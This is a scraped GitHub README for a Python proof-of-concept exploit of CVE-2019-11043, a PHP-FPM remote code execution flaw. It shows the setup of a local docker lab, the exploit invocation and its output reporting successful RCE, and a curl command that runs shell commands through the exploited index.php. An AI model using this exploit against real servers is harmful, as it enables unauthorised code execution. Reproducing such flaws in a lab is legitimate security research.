Skip to content
(PoC) Python version of CVE-2019-11043 exploit by neex
Python PHP
Branch: master
Clone or download
Type Name Latest commit message Commit time
Failed to load latest commit information.
conf draft Oct 28, 2019
php clean index.php Oct 28, 2019 add args description Oct 29, 2019
docker-compose.yml draft Oct 28, 2019 optimized detect/exploit Oct 29, 2019

PoC CVE-2019-11043

A Python version of the CVE-2019-11043 exploit
This PoC is still a draft, please use the exploit written by @neex
Vulnerability Analysis:

PoC Setup

Just run docker compose to bring up nginx and php-fpm:

# docker-compose up -d
Creating network "cve-2019-11043-git_app_net" with driver "bridge"
Creating php   ... done
Creating nginx ... done

if you wish to read php-fpm logs, you could run:

docker logs --tail 10 --follow php


# python3 --url http://localhost/index.php
[*] QSL candidate: 1752, 1757, 1762
[*] Target seems vulnerable: PHPSESSID=05b156ea034b903de6624f09c513541c; path=/
[*] RCE successfully exploited!

    You should be able to run commands using:
    curl http://localhost/index.php?a=bin/ls+/

If you want to check the vulnerability only, skipping the exploit:

python3 --url http://localhost/index.php --skip-rce
python3 --url http://localhost/index.php --reset

You can try to kill php-fpm process and reset all injected PHP settings with --reset:

python3 --url http://localhost/index.php --reset

Video PoC

You can’t perform that action at this time.